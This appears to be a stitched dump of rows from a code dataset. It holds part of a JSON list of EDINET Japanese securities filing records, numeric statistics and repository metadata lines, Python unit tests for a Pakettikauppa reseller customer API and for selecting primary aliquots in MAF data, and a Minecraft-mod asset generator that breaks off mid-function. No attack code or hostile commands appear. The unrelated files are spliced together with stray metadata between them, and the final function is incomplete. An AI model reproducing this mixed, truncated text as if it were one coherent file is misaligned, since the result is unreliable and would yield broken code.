"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 229,
"docID": "S100E35L",
"edinetCode": "E34376",
"secCode": null,
"JCN": null,
"filerName": "脇田 栄一",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:00",
"docDescription": "変更報告書",
"issuerEdinetCode": "E04055",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E31D",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 230,
"docID": "S100E2Z2",
"edinetCode": "E00913",
"secCode": "46260",
"JCN": "3011601003833",
"filerName": "太陽ホールディングス株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:00",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 231,
"docID": "S100E24E",
"edinetCode": "E07361",
"secCode": null,
"JCN": "8010401029670",
"filerName": "森トラスト株式会社",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "020002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:03",
"docDescription": "変更報告書(短期大量譲渡)",
"issuerEdinetCode": "E03946",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 232,
"docID": "S100E34H",
"edinetCode": "E03946",
"secCode": null,
"JCN": "4140001000056",
"filerName": "アーバンライフ株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "053000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:08",
"docDescription": "臨時報告書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第19条第2項第4号の2",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 233,
"docID": "S100E35O",
"edinetCode": "E34376",
"secCode": null,
"JCN": null,
"filerName": "脇田 栄一",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:14",
"docDescription": "変更報告書",
"issuerEdinetCode": "E04055",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E31D",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 234,
"docID": "S100E35R",
"edinetCode": "E25160",
"secCode": null,
"JCN": "6011101059489",
"filerName": "ゼニス羽田ホールディングス株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:17",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 235,
"docID": "S100E35X",
"edinetCode": "E34376",
"secCode": null,
"JCN": null,
"filerName": "脇田 栄一",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:30",
"docDescription": "変更報告書",
"issuerEdinetCode": "E04055",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E31D",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 236,
"docID": "S100E365",
"edinetCode": "E34376",
"secCode": null,
"JCN": null,
"filerName": "脇田 栄一",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:33",
"docDescription": "変更報告書",
"issuerEdinetCode": "E04055",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E31D",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 237,
"docID": "S100E367",
"edinetCode": "E34376",
"secCode": null,
"JCN": null,
"filerName": "脇田 栄一",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:36",
"docDescription": "変更報告書",
"issuerEdinetCode": "E04055",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E31D",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 238,
"docID": "S100E36A",
"edinetCode": "E34376",
"secCode": null,
"JCN": null,
"filerName": "脇田 栄一",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:39",
"docDescription": "変更報告書",
"issuerEdinetCode": "E04055",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E31D",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 239,
"docID": "S100E22C",
"edinetCode": "E09302",
"secCode": null,
"JCN": "1010401010604",
"filerName": "株式会社ゴルフダイジェスト社",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:41",
"docDescription": "変更報告書",
"issuerEdinetCode": "E05391",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 240,
"docID": "S100E2DC",
"edinetCode": "E10670",
"secCode": null,
"JCN": "2010001066608",
"filerName": "シンプレクス・アセット・マネジメント株式会社",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:42",
"docDescription": "変更報告書",
"issuerEdinetCode": "E02002",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S1001GCY",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 241,
"docID": "S100E2H0",
"edinetCode": "E09301",
"secCode": null,
"JCN": null,
"filerName": "木村 玄一",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:42",
"docDescription": "変更報告書",
"issuerEdinetCode": "E05391",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 242,
"docID": "S100E36C",
"edinetCode": "E34376",
"secCode": null,
"JCN": null,
"filerName": "脇田 栄一",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:46",
"docDescription": "変更報告書",
"issuerEdinetCode": "E04055",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E31D",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 243,
"docID": "S100E35B",
"edinetCode": "E12431",
"secCode": null,
"JCN": "3010001068479",
"filerName": "BNPパリバ・アセットマネジメント株式会社",
"fundCode": "G07943",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:49",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100B94Y",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 244,
"docID": "S100E30E",
"edinetCode": "E31925",
"secCode": "14350",
"JCN": "3290001025873",
"filerName": "株式会社TATERU",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "020002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:50",
"docDescription": "変更報告書(短期大量譲渡)",
"issuerEdinetCode": "E34177",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 245,
"docID": "S100DZGK",
"edinetCode": "E12431",
"secCode": null,
"JCN": "3010001068479",
"filerName": "BNPパリバ・アセットマネジメント株式会社",
"fundCode": "G07943",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-06-13",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 16:51",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第9期(平成29年6月13日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 246,
"docID": "S100E35J",
"edinetCode": "E02350",
"secCode": "62660",
"JCN": "6260001018266",
"filerName": "タツモ株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "023001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:53",
"docDescription": "訂正有価証券届出書(参照方式)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E1JW",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 247,
"docID": "S100E35M",
"edinetCode": "E02350",
"secCode": "62660",
"JCN": "6260001018266",
"filerName": "タツモ株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "023001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:54",
"docDescription": "訂正有価証券届出書(参照方式)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E1K1",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 248,
"docID": "S100E332",
"edinetCode": "E31774",
"secCode": null,
"JCN": "6140001011258",
"filerName": "明海興産株式会社",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:57",
"docDescription": "変更報告書",
"issuerEdinetCode": "E04242",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 249,
"docID": "S100E34Z",
"edinetCode": "E31774",
"secCode": null,
"JCN": "6140001011258",
"filerName": "明海興産株式会社",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "090001",
"docTypeCode": "360",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:59",
"docDescription": "訂正報告書(大量保有報告書・変更報告書)",
"issuerEdinetCode": "E04242",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E21M",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 250,
"docID": "S100E33W",
"edinetCode": "E05817",
"secCode": null,
"JCN": null,
"filerName": "マイクロソフトコーポレーション",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "102000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 17:05",
"docDescription": "臨時報告書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "0",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 251,
"docID": "S100E36J",
"edinetCode": "E00395",
"secCode": "25030",
"JCN": "5010001034768",
"filerName": "キリンホールディングス株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 17:06",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
}
]
}
"""
| 34.528407
| 94
| 0.453746
| 15,575
| 254,647
| 7.418941
| 0.084623
| 0.013137
| 0.017447
| 0.047789
| 0.896331
| 0.890576
| 0.887382
| 0.877092
| 0.876685
| 0.837438
| 0
| 0.110625
| 0.395355
| 254,647
| 7,374
| 95
| 34.533089
| 0.639484
| 0
| 0
| 0.783365
| 0
| 0
| 0.990626
| 0.06842
| 0
| 0
| 0
| 0
| 0.00068
| 1
| 0.000408
| false
| 0
| 0.001087
| 0
| 0.002039
| 0.000136
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
10f130922d82d8d8cd7471a02ba5cd201975b4ac
| 5,890
|
py
|
Python
|
tests/test_create_customer.py
|
vilkasgroup/Pakettikauppa
|
71545684d8516e95f933543fdd0cecc482824d28
|
[
"MIT"
] | null | null | null |
tests/test_create_customer.py
|
vilkasgroup/Pakettikauppa
|
71545684d8516e95f933543fdd0cecc482824d28
|
[
"MIT"
] | 24
|
2018-01-24T16:09:29.000Z
|
2022-01-01T19:32:10.000Z
|
tests/test_create_customer.py
|
vilkasgroup/Pakettikauppa
|
71545684d8516e95f933543fdd0cecc482824d28
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import logging
import unittest
# from unittest import TestCase
from pakettikauppa.reseller import PkReseller
# Emit DEBUG-level records so test runs show full diagnostic output.
logging.basicConfig(level=logging.DEBUG)
class TestPkReseller(unittest.TestCase):
    """Tests for PkReseller.create_customer input validation and creation."""

    @classmethod
    def setUpClass(cls):
        # One reseller client (test mode = 1) shared by every test; the calls
        # below exercise client-side validation or the test endpoint only.
        cls._reseller = PkReseller(1)
        cls.logger = logging.getLogger(__name__)

    def tearDown(self):
        """This method is called after each test."""
        pass

    @staticmethod
    def _customer_data(**overrides):
        """Return a complete, valid create_customer payload.

        Keyword arguments override the defaults, so each test only spells
        out the fields it actually cares about.
        """
        data = {
            'name': 'Vilkas Group Oy (Test)',
            'business_id': '12345678-9',
            'payment_service_provider': '',
            'psp_merchant_id': '',
            'marketing_name': '',
            'street_address': 'Finlaysoninkuja 19',
            'post_office': 'Tampere',
            'postcode': '33210',
            'country': 'Finland',
            'phone': '+35812345A5',
            'email': 'tipi@vilkas.fi',
            'contact_person_name': 'Porntip Härkönen',
            'contact_person_phone': '0123456789',
            'contact_person_email': 'tipi+test@vilkas.fi',
            'customer_service_phone': '',
            'customer_service_email': '',
        }
        data.update(overrides)
        return data

    def test_empty_parameter(self):
        """Calling with no parameters at all must raise."""
        with self.assertRaises(Exception):
            self._reseller.create_customer(**{})

    def test_too_short_parameter(self):
        """A payload missing most mandatory keys must raise KeyError."""
        with self.assertRaises(KeyError):
            self._reseller.create_customer(**{
                'name': 'Vilkas Group Oy Test',
            })

    def test_invalid_key(self):
        """An unknown key ('name2' instead of 'name') must raise KeyError."""
        data = self._customer_data(payment_service_provider='Invoice')
        del data['name']
        data['name2'] = 'Vilkas Group Oy (Test)'
        with self.assertRaises(KeyError):
            self._reseller.create_customer(**data)

    def test_missing_mandatory_field(self):
        """None values in mandatory fields must raise ValueError."""
        data = self._customer_data(payment_service_provider=None, country=None)
        with self.assertRaises(ValueError):
            self._reseller.create_customer(**data)

    def test_invalid_payment_service_provider(self):
        """An unsupported payment service provider must raise ValueError."""
        data = self._customer_data(payment_service_provider='Invoice')
        with self.assertRaises(ValueError):
            self._reseller.create_customer(**data)

    def test_missing_checkout_id(self):
        """PSP 'CHECKOUT' without a psp_merchant_id must raise ValueError."""
        data = self._customer_data(payment_service_provider='CHECKOUT')
        with self.assertRaises(ValueError):
            self._reseller.create_customer(**data)

    def test_create_customer(self):
        """A valid payload creates a customer and returns a non-empty id."""
        res_data = self._reseller.create_customer(**self._customer_data())
        customer_id = res_data['customer_id']
        # BUG FIX: the original chained the two checks with `and`;
        # assertIsNotNone() returns None (falsy), so the second check never
        # executed. It also used assertIsNot (identity) where an equality
        # comparison against '' is intended.
        self.assertIsNotNone(customer_id)
        self.assertNotEqual(customer_id, '')
# Allow running this module directly: `python test_create_customer.py`.
if __name__ == '__main__':
    unittest.main(verbosity=2)
| 37.75641
| 79
| 0.547878
| 539
| 5,890
| 5.699443
| 0.19295
| 0.063477
| 0.041016
| 0.059245
| 0.807943
| 0.794271
| 0.774089
| 0.774089
| 0.774089
| 0.774089
| 0
| 0.044417
| 0.315789
| 5,890
| 155
| 80
| 38
| 0.717866
| 0.095416
| 0
| 0.716535
| 0
| 0
| 0.351152
| 0.064224
| 0
| 0
| 0
| 0
| 0.055118
| 1
| 0.070866
| false
| 0.007874
| 0.023622
| 0
| 0.102362
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8008a6ccde5095ede1dccc158132adf4a2e896c3
| 4,762
|
py
|
Python
|
tests/test_selection.py
|
NCI-GDC/aliquot-level-maf
|
1b057aa3490386708224309ddd13dc40adad8ca2
|
[
"Apache-2.0"
] | 2
|
2020-03-16T15:00:47.000Z
|
2020-08-28T20:29:12.000Z
|
tests/test_selection.py
|
NCI-GDC/aliquot-level-maf
|
1b057aa3490386708224309ddd13dc40adad8ca2
|
[
"Apache-2.0"
] | 2
|
2020-03-17T20:41:03.000Z
|
2020-08-26T21:03:35.000Z
|
tests/test_selection.py
|
NCI-GDC/aliquot-level-maf
|
1b057aa3490386708224309ddd13dc40adad8ca2
|
[
"Apache-2.0"
] | 1
|
2020-08-14T08:49:03.000Z
|
2020-08-14T08:49:03.000Z
|
from datetime import datetime
from aliquot_level_maf.selection import (
PrimaryAliquotSelectionCriterion,
select_primary_aliquots,
SampleCriterion,
PrimaryAliquot,
)
def test_select_primary_aliquots__selects_correct_sample_type():
    """The criterion whose samples include 'Primary Tumor' is selected."""
    def make_criterion(criterion_id, sample_pairs):
        # All criteria share the entity and creation date; only id and
        # (sample id, sample type) pairs vary in this scenario.
        return PrimaryAliquotSelectionCriterion(
            id=criterion_id,
            samples=[
                SampleCriterion(id=sid, sample_type=stype)
                for sid, stype in sample_pairs
            ],
            entity_id="case_1",
            maf_creation_date=datetime(2020, 1, 1),
        )

    criteria = [
        make_criterion(
            "1", [("sample_1", "Ectoplasm"), ("sample_2", "Muslin")]
        ),
        make_criterion(
            "2",
            [("sample_3", "Primary Tumor"), ("sample_4", "Blood Derived Normal")],
        ),
        make_criterion(
            "3", [("sample_5", "Unknown"), ("sample_6", "Recurrent Tumor")]
        ),
    ]

    selected = select_primary_aliquots(criteria)

    assert selected["case_1"] == PrimaryAliquot(id="2", sample_id="sample_3")
def test_select_primary_aliquots__uses_maf_creation_date_to_break_tie():
    """When sample types tie, the earlier maf_creation_date wins."""
    def make_criterion(criterion_id, tumor_id, normal_id, created):
        return PrimaryAliquotSelectionCriterion(
            id=criterion_id,
            samples=[
                SampleCriterion(id=tumor_id, sample_type="Primary Tumor"),
                SampleCriterion(id=normal_id, sample_type="Blood Derived Normal"),
            ],
            entity_id="case_1",
            maf_creation_date=created,
        )

    criteria = [
        make_criterion("1", "sample_a", "sample_b", datetime(2020, 1, 1)),
        make_criterion("2", "sample_d", "sample_e", datetime(2020, 1, 2)),
    ]

    selected = select_primary_aliquots(criteria)

    # Criterion "1" is one day older, so it is preferred.
    assert selected["case_1"] == PrimaryAliquot(id="1", sample_id="sample_a")
def test_select_primary_aliquots__uses_maf_uuid_to_break_tie():
    """When sample types AND dates tie, selection still picks criterion "1"."""
    def make_criterion(criterion_id, tumor_id, normal_id):
        # Identical sample types and identical creation dates force the
        # selection to fall back to its final (id-based) tie-breaker.
        return PrimaryAliquotSelectionCriterion(
            id=criterion_id,
            samples=[
                SampleCriterion(id=tumor_id, sample_type="Primary Tumor"),
                SampleCriterion(id=normal_id, sample_type="Blood Derived Normal"),
            ],
            entity_id="case_1",
            maf_creation_date=datetime(2020, 1, 1),
        )

    criteria = [
        make_criterion("1", "sample_a", "sample_b"),
        make_criterion("2", "sample_d", "sample_e"),
    ]

    selected = select_primary_aliquots(criteria)

    assert selected["case_1"] == PrimaryAliquot(id="1", sample_id="sample_a")
def test_select_primary_aliquots__handles_multiple_cases():
    """Each entity id gets its own, independently selected primary aliquot."""
    def make_criterion(criterion_id, entity, sample_pairs):
        return PrimaryAliquotSelectionCriterion(
            id=criterion_id,
            samples=[
                SampleCriterion(id=sid, sample_type=stype)
                for sid, stype in sample_pairs
            ],
            entity_id=entity,
            maf_creation_date=datetime(2020, 1, 1),
        )

    criteria = [
        make_criterion(
            "1", "case_1", [("sample_1", "Ectoplasm"), ("sample_2", "Muslin")]
        ),
        make_criterion(
            "2",
            "case_1",
            [("sample_3", "Primary Tumor"), ("sample_4", "Blood Derived Normal")],
        ),
        make_criterion(
            "3", "case_2", [("sample_5", "Unknown"), ("sample_6", "Recurrent Tumor")]
        ),
    ]

    selected = select_primary_aliquots(criteria)

    assert selected["case_1"] == PrimaryAliquot(id="2", sample_id="sample_3")
    assert selected["case_2"] == PrimaryAliquot(id="3", sample_id="sample_6")
def test_select_primary_aliquots__no_criteria():
    """No criteria means nothing to select: the result mapping is empty."""
    selected = select_primary_aliquots([])
    assert len(selected) == 0
| 34.759124
| 84
| 0.584838
| 461
| 4,762
| 5.713666
| 0.127983
| 0.07593
| 0.174639
| 0.113895
| 0.88079
| 0.859529
| 0.859529
| 0.843584
| 0.843584
| 0.843584
| 0
| 0.031718
| 0.298194
| 4,762
| 136
| 85
| 35.014706
| 0.756433
| 0
| 0
| 0.826446
| 0
| 0
| 0.121168
| 0
| 0
| 0
| 0
| 0
| 0.049587
| 1
| 0.041322
| false
| 0
| 0.016529
| 0
| 0.057851
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
33ed952f40e128538402f0f65b4aa575d58a8f9b
| 3,288
|
py
|
Python
|
src/main/resources/asset_helper.py
|
Archydra-Studios/Primeval
|
339bdd7d82869ea014ca64e55f5636d95ad1e0b0
|
[
"MIT"
] | 9
|
2021-12-12T00:10:16.000Z
|
2022-03-26T16:29:40.000Z
|
src/main/resources/asset_helper.py
|
Archydra-Studios/Primeval
|
339bdd7d82869ea014ca64e55f5636d95ad1e0b0
|
[
"MIT"
] | 22
|
2022-03-28T20:58:26.000Z
|
2022-03-30T20:03:49.000Z
|
src/main/resources/asset_helper.py
|
devs-immortal/Primeval
|
339bdd7d82869ea014ca64e55f5636d95ad1e0b0
|
[
"MIT"
] | null | null | null |
import os
# Resource namespace used for every generated asset file.
MOD_ID = "primeval"


def get_asset_path():
    """Return the assets root directory (trailing slash), relative to the CWD."""
    return "%s/assets/" % os.getcwd()
def generate_standard_block(block_id):
    """Write blockstate, block model, and item model JSON for a simple cube block.

    Creates three files under the mod's asset tree (the directories must
    already exist): a blockstate with a single default variant, a cube_all
    block model textured with the block id, and an item model parented to
    the block model.
    """
    asset_root = get_asset_path() + MOD_ID
    # `with` guarantees the handles are closed even if a write raises
    # (the original closed them manually and would leak on error).
    with open(asset_root + "/blockstates/" + block_id + ".json", "w") as blockstate_file:
        blockstate_file.write("{\n\t\"variants\": {\n\t\t\"\": {\n\t\t\t\"model\": \"" + MOD_ID + ":block/" + block_id + "\"\n\t\t}\n\t}\n}")
    with open(asset_root + "/models/block/" + block_id + ".json", "w") as block_model_file:
        block_model_file.write("{\n\t\"parent\": \"minecraft:block/cube_all\",\n\t\"textures\": {\n\t\t\"all\": \"" + MOD_ID + ":block/" + block_id + "\"\n\t}\n}")
    with open(asset_root + "/models/item/" + block_id + ".json", "w") as item_model_file:
        item_model_file.write("{\n\t\"parent\": \"" + MOD_ID + ":block/" + block_id + "\"\n}")
def generate_standard_item(item_id):
    """Write an item model JSON for a flat ('minecraft:item/generated') item.

    The target directory must already exist; the file is overwritten.
    """
    # `with` closes the handle even if the write raises (original leaked on error).
    with open(get_asset_path() + MOD_ID + "/models/item/" + item_id + ".json", "w") as item_model_file:
        item_model_file.write("{\n\t\"parent\": \"minecraft:item/generated\",\n\t\"textures\": {\n\t\t\"layer0\": \"" + MOD_ID + ":item/" + item_id + "\"\n\t}\n}")
def generate_handheld_item(item_id):
    """Write an item model JSON for a handheld ('minecraft:item/handheld') item.

    The target directory must already exist; the file is overwritten.
    """
    # `with` closes the handle even if the write raises (original leaked on error).
    with open(get_asset_path() + MOD_ID + "/models/item/" + item_id + ".json", "w") as item_model_file:
